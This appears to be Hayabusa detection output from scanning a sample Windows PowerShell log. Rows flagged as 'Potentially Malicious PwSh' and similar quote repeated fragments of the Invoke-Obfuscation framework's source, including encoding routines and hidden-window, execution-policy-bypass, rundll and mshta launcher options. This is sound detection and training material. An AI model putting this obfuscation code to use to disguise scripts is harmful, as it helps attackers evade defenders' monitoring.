$EncodedCommand = $UserInputOptionValue.SubString($UserInputOptionValue.ToLower().IndexOf(' -e')+3) $EncodedCommand = $EncodedCommand.SubString($EncodedCommand.IndexOf(' ')).Trim("" '`"""") # Decode Unicode-encoded $EncodedCommand $UserInputOptionValue = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedCommand)) } # Set script-wide variables for future reference. $Script:ScriptPath = 'N/A' $Script:ScriptBlock = $UserInputOptionValue $Script:ObfuscatedCommand = $UserInputOptionValue $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $UserInputOptionValue $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptBlock:"" -ForegroundColor Cyan Write-Host $Script:ScriptBlock -ForegroundColor Magenta } 'emptyvalue' { # No OPTIONVALUE was entered after OPTIONNAME. $HasError = $TRUE Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' No value was entered after' -NoNewLine Write-Host ' SCRIPTBLOCK/SCRIPTPATH' -NoNewLine -ForegroundColor Cyan Write-Host '.' 
-NoNewLine } default {Write-Error ""An invalid OPTIONNAME ($UserInputOptionName) was passed to switch block.""; Exit} } } Else { $HasError = $TRUE Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' OPTIONNAME' -NoNewLine Write-Host "" $UserInputOptionName"" -NoN",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"ewLine -ForegroundColor Cyan Write-Host "" is not a settable option."" -NoNewLine } If($HasError) { Write-Host ""`n Correct syntax is"" -NoNewLine Write-Host ' SET OPTIONNAME VALUE' -NoNewLine -ForegroundColor Green Write-Host '.' -NoNewLine Write-Host ""`n Enter"" -NoNewLine Write-Host ' SHOW OPTIONS' -NoNewLine -ForegroundColor Yellow Write-Host ' for more details.' } } ElseIf(($AcceptableInput -Contains $UserInput) -OR ($OverrideAcceptableInput)) { # User input matches $AcceptableInput extracted from the current $Menu, so decide if: # 1) an obfuscation function needs to be called and remain in current interactive prompt, or # 2) return value to enter into a new interactive prompt. # Format breadcrumb trail to successfully retrieve the next interactive prompt. $UserInput = $BreadCrumb.Trim('\').Replace('\','_') + '_' + $UserInput If($BreadCrumb.StartsWith('\')) {$UserInput = '_' + $UserInput} # If the current selection contains a command to execute then continue. Otherwise return to go to another menu. If($SelectionContainsCommand) { # Make sure user has entered command or path to script. 
If($Script:ObfuscatedCommand -ne $NULL) { # Iterate through lines in $Menu to extract command for the current selection in $UserInput. ForEach($Line in $Menu) { If($Line[1].Trim(' ') -eq $UserInput.SubString($UserInput.LastIndexOf('_')+1)) {$CommandToExec = $Line[3]; Continue} } If(!$OverrideAcceptableInput) { # Extract arguments from $CommandToExec. $Function = $CommandToExec[0] $Token = $CommandToExec[1] $ObfLevel = $CommandToExec[2] } Else { # Overload above arguments if $OverrideAcceptableInput is $TRUE, and extract $Function from $BreadCrumb Switch($BreadCrumb.ToLower()) { '\launcher\ps' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 1} '\launcher\cmd' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 2} '\launcher\wmic' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 3} '\launcher\rundll' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 4} '\launcher\var+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 5} '\launcher\stdin+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 6} '\launcher\clip+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 7} '\launcher\var++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 8} '\launcher\stdin++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 9} '\launcher\clip++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 10} '\launcher\rundll++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 11} '\launcher\mshta++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 12} default {Write-Error ""An invalid value ($($BreadCrumb.ToLower())) was passed to switch block for setting `$Function when `$OverrideAcceptableInput -eq `$TRUE.""; Exit} } # Extract $ObfLevel from first element in array (in case 0th element is used for informational purposes), and extract $Token from $BreadCrumb. $ObfLevel = $Menu[1][3][2] $Token = $UserInput.SubString($UserInput.LastIndexOf('_')+1) } # Convert ObfuscatedCommand (string) to ScriptBlock for next obfuscation function. 
If(!($Script:LauncherApplied)) { $ObfCommandScriptBlock = $ExecutionContext.InvokeCommand.NewScriptBlock($Script:ObfuscatedCommand) } # Validate that user has set SCRIPTPATH or SCRIPTBLOCK (by seeing if $Script:ObfuscatedCommand is empty). If($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute obfuscation commands without setting ScriptPath or ScriptBlock values in SHOW OPTIONS menu. Set these by executing"" -NoNewLine Write-Host ' SET SCRIPTBLOCK script_block_or_command' -NoNewLine -ForegroundColor Green Write-Host ' or' -NoNewLine Write-Host ' SET SCRIPTPATH path_to_script_or_URL' -NoNewLine -ForegroundColor Green Write-Host '.' Continue } # Save current ObfuscatedCommand to see if obfuscation was successful (i.e. no warnings prevented obfuscation from occurring). $ObfuscatedCommandBefore = $Script:ObfuscatedCommand $CmdToPrint = $NULL If($Script:LauncherApplied) { If($Function -eq 'Out-PowerShellLauncher') { $ErrorMessage = ' You have already applied a launcher to ObfuscatedCommand.' } Else { $ErrorMessage = ' You cannot obfuscate after applying a Launcher to ObfuscatedCommand.' } Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host $ErrorMessage -NoNewLine Write-Host ""`n Enter"" -NoNewLine Write-Host ' UNDO' -NoNewLine -ForegroundColor Yellow Write-Host "" to remove the launcher from ObfuscatedCommand.`n"" -NoNewLine } Else { # Switch block to route to the correct function. 
Switch($Function) { 'Out-ObfuscatedTokenCommand' { $Script:ObfuscatedCommand = Out-ObfuscatedTokenCommand -ScriptBlock $ObfCommandScriptBlock $Token $ObfLevel $CmdToPrint = @(""Out-ObfuscatedTokenCommand -ScriptBlock "","" '$Token' $ObfLevel"") } 'Out-ObfuscatedTokenCommandAll' { $Script:ObfuscatedCommand = Out-ObfuscatedTokenCommand -ScriptBlock $ObfCommandScriptBlock $CmdToPrint = @(""Out-ObfuscatedTokenCommand -ScriptBlock "","""") } 'Out-ObfuscatedStringCommand' { $Script:ObfuscatedCommand = Out-ObfuscatedStringCommand -ScriptBlock $ObfCommandScriptBlock $ObfLevel $CmdToPrint = @(""Out-ObfuscatedStringCommand -ScriptBlock "","" $ObfLevel"") } 'Out-EncodedAsciiCommand' { $Script:ObfuscatedCommand = Out-EncodedAsciiCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedAsciiCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedHexCommand' { $Script:ObfuscatedCommand = Out-EncodedHexCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedHexCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedOctalCommand' { $Script:ObfuscatedCommand = Out-EncodedOctalCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedOctalCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedBinaryCommand' { $Script:ObfuscatedCommand = Out-EncodedBinaryCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedBinaryCommand -ScriptBlock "","" -PassThru"") } 'Out-SecureStringCommand' { $Script:ObfuscatedCommand = Out-SecureStringCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-SecureStringCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedBXORCommand' { $Script:ObfuscatedCommand = Out-EncodedBXORCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedBXORCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedSpecialCharOnlyCommand' { $Script:ObfuscatedCommand = Out-EncodedSpecialCharOnlyCommand -ScriptBlock $ObfCommandScriptBlock 
-PassThru $CmdToPrint = @(""Out-EncodedSpecialCharOnlyCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedWhitespaceCommand' { $Script:ObfuscatedCommand = Out-EncodedWhitespaceCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedWhitespaceCommand -ScriptBlock "","" -PassThru"") } 'Out-PowerShellLauncher' { # Extract numbers from string so we can output proper flag syntax in ExecutionCommands history. $SwitchesAsStringArray = [char[]]$Token | Sort-Object -Unique | Where-Object {$_ -ne ' '} If($SwitchesAsStringArray -Contains '0') { $CmdToPrint = @(""Out-PowerShellLauncher -ScriptBlock "","" $ObfLevel"") } Else { $HasWindowStyle = $FALSE $SwitchesToPrint = @() ForEach($Value in $SwitchesAsStringArray) { Switch($Value)",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"ewLine -ForegroundColor Cyan Write-Host "" is not a settable option."" -NoNewLine } If($HasError) { Write-Host ""`n Correct syntax is"" -NoNewLine Write-Host ' SET OPTIONNAME VALUE' -NoNewLine -ForegroundColor Green Write-Host '.' -NoNewLine Write-Host ""`n Enter"" -NoNewLine Write-Host ' SHOW OPTIONS' -NoNewLine -ForegroundColor Yellow Write-Host ' for more details.' } } ElseIf(($AcceptableInput -Contains $UserInput) -OR ($OverrideAcceptableInput)) { # User input matches $AcceptableInput extracted from the current $Menu, so decide if: # 1) an obfuscation function needs to be called and remain in current interactive prompt, or # 2) return value to enter into a new interactive prompt. # Format breadcrumb trail to successfully retrieve the next interactive prompt. $UserInput = $BreadCrumb.Trim('\').Replace('\','_') + '_' + $UserInput If($BreadCrumb.StartsWith('\')) {$UserInput = '_' + $UserInput} # If the current selection contains a command to execute then continue. 
Otherwise return to go to another menu. If($SelectionContainsCommand) { # Make sure user has entered command or path to script. If($Script:ObfuscatedCommand -ne $NULL) { # Iterate through lines in $Menu to extract command for the current selection in $UserInput. ForEach($Line in $Menu) { If($Line[1].Trim(' ') -eq $UserInput.SubString($UserInput.LastIndexOf('_')+1)) {$CommandToExec = $Line[3]; Continue} } If(!$OverrideAcceptableInput) { # Extract arguments from $CommandToExec. $Function = $CommandToExec[0] $Token = $CommandToExec[1] $ObfLevel = $CommandToExec[2] } Else { # Overload above arguments if $OverrideAcceptableInput is $TRUE, and extract $Function from $BreadCrumb Switch($BreadCrumb.ToLower()) { '\launcher\ps' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 1} '\launcher\cmd' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 2} '\launcher\wmic' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 3} '\launcher\rundll' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 4} '\launcher\var+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 5} '\launcher\stdin+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 6} '\launcher\clip+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 7} '\launcher\var++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 8} '\launcher\stdin++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 9} '\launcher\clip++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 10} '\launcher\rundll++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 11} '\launcher\mshta++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 12} default {Write-Error ""An invalid value ($($BreadCrumb.ToLower())) was passed to switch block for setting `$Function when `$OverrideAcceptableInput -eq `$TRUE.""; Exit} } # Extract $ObfLevel from first element in array (in case 0th element is used for informational purposes), and extract $Token from $BreadCrumb. 
$ObfLevel = $Menu[1][3][2] $Token = $UserInput.SubString($UserInput.LastIndexOf('_')+1) } # Convert ObfuscatedCommand (string) to ScriptBlock for next obfuscation function. If(!($Script:LauncherApplied)) { $ObfCommandScriptBlock = $ExecutionContext.InvokeCommand.NewScriptBlock($Script:ObfuscatedCommand) } # Validate that user has set SCRIPTPATH or SCRIPTBLOCK (by seeing if $Script:ObfuscatedCommand is empty). If($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute obfuscation commands without setting ScriptPath or ScriptBlock values in SHOW OPTIONS menu. Set these by executing"" -NoNewLine Write-Host ' SET SCRIPTBLOCK script_block_or_command' -NoNewLine -ForegroundColor Green Write-Host ' or' -NoNewLine Write-Host ' SET SCRIPTPATH path_to_script_or_URL' -NoNewLine -ForegroundColor Green Write-Host '.' Continue } # Save current ObfuscatedCommand to see if obfuscation was successful (i.e. no warnings prevented obfuscation from occurring). $ObfuscatedCommandBefore = $Script:ObfuscatedCommand $CmdToPrint = $NULL If($Script:LauncherApplied) { If($Function -eq 'Out-PowerShellLauncher') { $ErrorMessage = ' You have already applied a launcher to ObfuscatedCommand.' } Else { $ErrorMessage = ' You cannot obfuscate after applying a Launcher to ObfuscatedCommand.' } Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host $ErrorMessage -NoNewLine Write-Host ""`n Enter"" -NoNewLine Write-Host ' UNDO' -NoNewLine -ForegroundColor Yellow Write-Host "" to remove the launcher from ObfuscatedCommand.`n"" -NoNewLine } Else { # Switch block to route to the correct function. 
Switch($Function) { 'Out-ObfuscatedTokenCommand' { $Script:ObfuscatedCommand = Out-ObfuscatedTokenCommand -ScriptBlock $ObfCommandScriptBlock $Token $ObfLevel $CmdToPrint = @(""Out-ObfuscatedTokenCommand -ScriptBlock "","" '$Token' $ObfLevel"") } 'Out-ObfuscatedTokenCommandAll' { $Script:ObfuscatedCommand = Out-ObfuscatedTokenCommand -ScriptBlock $ObfCommandScriptBlock $CmdToPrint = @(""Out-ObfuscatedTokenCommand -ScriptBlock "","""") } 'Out-ObfuscatedStringCommand' { $Script:ObfuscatedCommand = Out-ObfuscatedStringCommand -ScriptBlock $ObfCommandScriptBlock $ObfLevel $CmdToPrint = @(""Out-ObfuscatedStringCommand -ScriptBlock "","" $ObfLevel"") } 'Out-EncodedAsciiCommand' { $Script:ObfuscatedCommand = Out-EncodedAsciiCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedAsciiCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedHexCommand' { $Script:ObfuscatedCommand = Out-EncodedHexCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedHexCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedOctalCommand' { $Script:ObfuscatedCommand = Out-EncodedOctalCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedOctalCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedBinaryCommand' { $Script:ObfuscatedCommand = Out-EncodedBinaryCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedBinaryCommand -ScriptBlock "","" -PassThru"") } 'Out-SecureStringCommand' { $Script:ObfuscatedCommand = Out-SecureStringCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-SecureStringCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedBXORCommand' { $Script:ObfuscatedCommand = Out-EncodedBXORCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedBXORCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedSpecialCharOnlyCommand' { $Script:ObfuscatedCommand = Out-EncodedSpecialCharOnlyCommand -ScriptBlock $ObfCommandScriptBlock 
-PassThru $CmdToPrint = @(""Out-EncodedSpecialCharOnlyCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedWhitespaceCommand' { $Script:ObfuscatedCommand = Out-EncodedWhitespaceCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedWhitespaceCommand -ScriptBlock "","" -PassThru"") } 'Out-PowerShellLauncher' { # Extract numbers from string so we can output proper flag syntax in ExecutionCommands history. $SwitchesAsStringArray = [char[]]$Token | Sort-Object -Unique | Where-Object {$_ -ne ' '} If($SwitchesAsStringArray -Contains '0') { $CmdToPrint = @(""Out-PowerShellLauncher -ScriptBlock "","" $ObfLevel"") } Else { $HasWindowStyle = $FALSE $SwitchesToPrint = @() ForEach($Value in $SwitchesAsStringArray) { Switch($Value)",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"{ 1 {$SwitchesToPrint += '-NoExit'} 2 {$SwitchesToPrint += '-NonInteractive'} 3 {$SwitchesToPrint += '-NoLogo'} 4 {$SwitchesToPrint += '-NoProfile'} 5 {$SwitchesToPrint += '-Command'} 6 {If(!$HasWindowStyle) {$SwitchesToPrint += '-WindowStyle Hidden'; $HasWindowStyle = $TRUE}} 7 {$SwitchesToPrint += '-ExecutionPolicy Bypass'} 8 {$SwitchesToPrint += '-Wow64'} default {Write-Error ""An invalid `$SwitchesAsString value ($Value) was passed to switch block.""; Exit;} } } $SwitchesToPrint = $SwitchesToPrint -Join ' ' $CmdToPrint = @(""Out-PowerShellLauncher -ScriptBlock "","" $SwitchesToPrint $ObfLevel"") } $Script:ObfuscatedCommand = Out-PowerShellLauncher -ScriptBlock $ObfCommandScriptBlock -SwitchesAsString $Token $ObfLevel # Only set LauncherApplied to true if before/after are different (i.e. no warnings prevented launcher from being applied). 
If($ObfuscatedCommandBefore -ne $Script:ObfuscatedCommand) { $Script:LauncherApplied = $TRUE } } default {Write-Error ""An invalid `$Function value ($Function) was passed to switch block.""; Exit;} } If(($Script:ObfuscatedCommand -ceq $ObfuscatedCommandBefore) -AND ($MenuName.StartsWith('_Token_'))) { Write-Host ""`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" There were not any"" -NoNewLine If($BreadCrumb.SubString($BreadCrumb.LastIndexOf('\')+1).ToLower() -ne 'all') {Write-Host "" $($BreadCrumb.SubString($BreadCrumb.LastIndexOf('\')+1))"" -NoNewLine -ForegroundColor Yellow} Write-Host "" tokens to further obfuscate, so nothing changed."" } Else { # Add to $Script:ObfuscatedCommandHistory if a change took place for the current ObfuscatedCommand. $Script:ObfuscatedCommandHistory += , $Script:ObfuscatedCommand # Convert UserInput to CLI syntax to store in CliSyntax variable if obfuscation occurred. $CliSyntaxCurrentCommand = $UserInput.Trim('_ ').Replace('_','\') # Add CLI command syntax to $Script:CliSyntax to maintain a history of commands to arrive at current obfuscated command for CLI syntax. $Script:CliSyntax += $CliSyntaxCurrentCommand # Add execution syntax to $Script:ExecutionCommands to maintain a history of commands to arrive at current obfuscated command. $Script:ExecutionCommands += ($CmdToPrint[0] + '$ScriptBlock' + $CmdToPrint[1]) # Output syntax of CLI syntax and full command we executed in above Switch block. Write-Host ""`nExecuted:`t"" Write-Host "" CLI: "" -NoNewline Write-Host $CliSyntaxCurrentCommand -ForegroundColor Cyan Write-Host "" FULL: "" -NoNewline Write-Host $CmdToPrint[0] -NoNewLine -ForegroundColor Cyan Write-Host '$ScriptBlock' -NoNewLine -ForegroundColor Magenta Write-Host $CmdToPrint[1] -ForegroundColor Cyan # Output obfuscation result. 
Write-Host ""`nResult:`t"" Out-ScriptContents $Script:ObfuscatedCommand -PrintWarning } } } } Else { Return $UserInput } } Else { If ($MenuInputOptionsShowHelp[0] -Contains $UserInput) {Show-HelpMenu} ElseIf($MenuInputOptionsShowOptions[0] -Contains $UserInput) {Show-OptionsMenu} ElseIf($TutorialInputOptions[0] -Contains $UserInput) {Show-Tutorial} ElseIf($ClearScreenInputOptions[0] -Contains $UserInput) {Clear-Host} # For Version 1.0 ASCII art is not necessary. #ElseIf($ShowAsciiArtInputOptions[0] -Contains $UserInput) {Show-AsciiArt -Random} ElseIf($ResetObfuscationInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne $NULL) -AND ($Script:ObfuscatedCommand.Length -eq 0)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" ObfuscatedCommand has not been set. There is nothing to reset."" } ElseIf($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" No obfuscation has been applied to ObfuscatedCommand. There is nothing to reset."" } Else { $Script:LauncherApplied = $FALSE $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @($Script:ScriptBlock) $Script:CliSyntax = @() $Script:ExecutionCommands = @() Write-Host ""`n`nSuccessfully reset ObfuscatedCommand."" -ForegroundColor Cyan } } ElseIf($UndoObfuscationInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne $NULL) -AND ($Script:ObfuscatedCommand.Length -eq 0)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" ObfuscatedCommand has not been set. There is nothing to undo."" } ElseIf($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" No obfuscation has been applied to ObfuscatedCommand. There is nothing to undo."" } Else { # Set ObfuscatedCommand to the last state in ObfuscatedCommandHistory. 
$Script:ObfuscatedCommand = $Script:ObfuscatedCommandHistory[$Script:ObfuscatedCommandHistory.Count-2] # Remove the last state from ObfuscatedCommandHistory. $Temp = $Script:ObfuscatedCommandHistory $Script:ObfuscatedCommandHistory = @() For($i=0; $i -lt $Temp.Count-1; $i++) { $Script:ObfuscatedCommandHistory += $Temp[$i] } # Remove last command from CliSyntax. Trim all trailing OUT or CLIP commands until an obfuscation command is removed. $CliSyntaxCount = $Script:CliSyntax.Count While(($Script:CliSyntax[$CliSyntaxCount-1] -Match '^(clip|out )') -AND ($CliSyntaxCount -gt 0)) { $CliSyntaxCount-- } $Temp = $Script:CliSyntax $Script:CliSyntax = @() For($i=0; $i -lt $CliSyntaxCount-1; $i++) { $Script:CliSyntax += $Temp[$i] } # Remove last command from ExecutionCommands. $Temp = $Script:ExecutionCommands $Script:ExecutionCommands = @() For($i=0; $i -lt $Temp.Count-1; $i++) { $Script:ExecutionCommands += $Temp[$i] } # If this is removing a launcher then we must change the launcher state so we can continue obfuscating. If($Script:LauncherApplied) { $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully removed launcher from ObfuscatedCommand."" -ForegroundColor Cyan } Else { Write-Host ""`n`nSuccessfully removed last obfuscation from ObfuscatedCommand."" -ForegroundColor Cyan } } } ElseIf(($OutputToDiskInputOptions[0] -Contains $UserInput) -OR ($OutputToDiskInputOptions[0] -Contains $UserInput.Trim().Split(' ')[0])) { If(($Script:ObfuscatedCommand -ne '') -AND ($Script:ObfuscatedCommand -ceq $Script:ScriptBlock)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" You haven't applied any obfuscation.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { # Get file path information from compound user input (e.g. OUT C:\FILENAME.TXT). 
If($UserInput.Trim().Split(' ').Count -gt 1) { # Get file path information from user input. $UserInputOutputFilePath = $UserInput.Trim().SubString(4).Trim() Write-Host '' } Else { # Get file path information from user interactively. $UserInputOutputFilePath = Read-Host ""`n`nEnter path for output file (or leave blank for default)"" } # Decipher if user input a full file path, just a file name or nothing (default). If($UserInputOutputFilePath.Trim() -eq '') { # User did not input anything so use default filename and current directory of this script. $OutputFilePath = ""$ScriptDir\Obfuscated_Command.txt"" } ElseIf(!($UserInputOutputFilePath.Contains('\')) -AND !($UserInputOutputFilePath.Contains('/'))) { # User input is not a file path so treat it as a filename and use current directory of this script. $OutputFilePath = ""$ScriptDi",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ 1 {$SwitchesToPrint += '-NoExit'} 2 {$SwitchesToPrint += '-NonInteractive'} 3 {$SwitchesToPrint += '-NoLogo'} 4 {$SwitchesToPrint += '-NoProfile'} 5 {$SwitchesToPrint += '-Command'} 6 {If(!$HasWindowStyle) {$SwitchesToPrint += '-WindowStyle Hidden'; $HasWindowStyle = $TRUE}} 7 {$SwitchesToPrint += '-ExecutionPolicy Bypass'} 8 {$SwitchesToPrint += '-Wow64'} default {Write-Error ""An invalid `$SwitchesAsString value ($Value) was passed to switch block.""; Exit;} } } $SwitchesToPrint = $SwitchesToPrint -Join ' ' $CmdToPrint = @(""Out-PowerShellLauncher -ScriptBlock "","" $SwitchesToPrint $ObfLevel"") } $Script:ObfuscatedCommand = Out-PowerShellLauncher -ScriptBlock $ObfCommandScriptBlock -SwitchesAsString $Token $ObfLevel # Only set LauncherApplied to true if before/after are different (i.e. no warnings prevented launcher from being applied). 
If($ObfuscatedCommandBefore -ne $Script:ObfuscatedCommand) { $Script:LauncherApplied = $TRUE } } default {Write-Error ""An invalid `$Function value ($Function) was passed to switch block.""; Exit;} } If(($Script:ObfuscatedCommand -ceq $ObfuscatedCommandBefore) -AND ($MenuName.StartsWith('_Token_'))) { Write-Host ""`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" There were not any"" -NoNewLine If($BreadCrumb.SubString($BreadCrumb.LastIndexOf('\')+1).ToLower() -ne 'all') {Write-Host "" $($BreadCrumb.SubString($BreadCrumb.LastIndexOf('\')+1))"" -NoNewLine -ForegroundColor Yellow} Write-Host "" tokens to further obfuscate, so nothing changed."" } Else { # Add to $Script:ObfuscatedCommandHistory if a change took place for the current ObfuscatedCommand. $Script:ObfuscatedCommandHistory += , $Script:ObfuscatedCommand # Convert UserInput to CLI syntax to store in CliSyntax variable if obfuscation occurred. $CliSyntaxCurrentCommand = $UserInput.Trim('_ ').Replace('_','\') # Add CLI command syntax to $Script:CliSyntax to maintain a history of commands to arrive at current obfuscated command for CLI syntax. $Script:CliSyntax += $CliSyntaxCurrentCommand # Add execution syntax to $Script:ExecutionCommands to maintain a history of commands to arrive at current obfuscated command. $Script:ExecutionCommands += ($CmdToPrint[0] + '$ScriptBlock' + $CmdToPrint[1]) # Output syntax of CLI syntax and full command we executed in above Switch block. Write-Host ""`nExecuted:`t"" Write-Host "" CLI: "" -NoNewline Write-Host $CliSyntaxCurrentCommand -ForegroundColor Cyan Write-Host "" FULL: "" -NoNewline Write-Host $CmdToPrint[0] -NoNewLine -ForegroundColor Cyan Write-Host '$ScriptBlock' -NoNewLine -ForegroundColor Magenta Write-Host $CmdToPrint[1] -ForegroundColor Cyan # Output obfuscation result. 
Write-Host ""`nResult:`t"" Out-ScriptContents $Script:ObfuscatedCommand -PrintWarning } } } } Else { Return $UserInput } } Else { If ($MenuInputOptionsShowHelp[0] -Contains $UserInput) {Show-HelpMenu} ElseIf($MenuInputOptionsShowOptions[0] -Contains $UserInput) {Show-OptionsMenu} ElseIf($TutorialInputOptions[0] -Contains $UserInput) {Show-Tutorial} ElseIf($ClearScreenInputOptions[0] -Contains $UserInput) {Clear-Host} # For Version 1.0 ASCII art is not necessary. #ElseIf($ShowAsciiArtInputOptions[0] -Contains $UserInput) {Show-AsciiArt -Random} ElseIf($ResetObfuscationInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne $NULL) -AND ($Script:ObfuscatedCommand.Length -eq 0)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" ObfuscatedCommand has not been set. There is nothing to reset."" } ElseIf($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" No obfuscation has been applied to ObfuscatedCommand. There is nothing to reset."" } Else { $Script:LauncherApplied = $FALSE $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @($Script:ScriptBlock) $Script:CliSyntax = @() $Script:ExecutionCommands = @() Write-Host ""`n`nSuccessfully reset ObfuscatedCommand."" -ForegroundColor Cyan } } ElseIf($UndoObfuscationInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne $NULL) -AND ($Script:ObfuscatedCommand.Length -eq 0)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" ObfuscatedCommand has not been set. There is nothing to undo."" } ElseIf($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" No obfuscation has been applied to ObfuscatedCommand. There is nothing to undo."" } Else { # Set ObfuscatedCommand to the last state in ObfuscatedCommandHistory. 
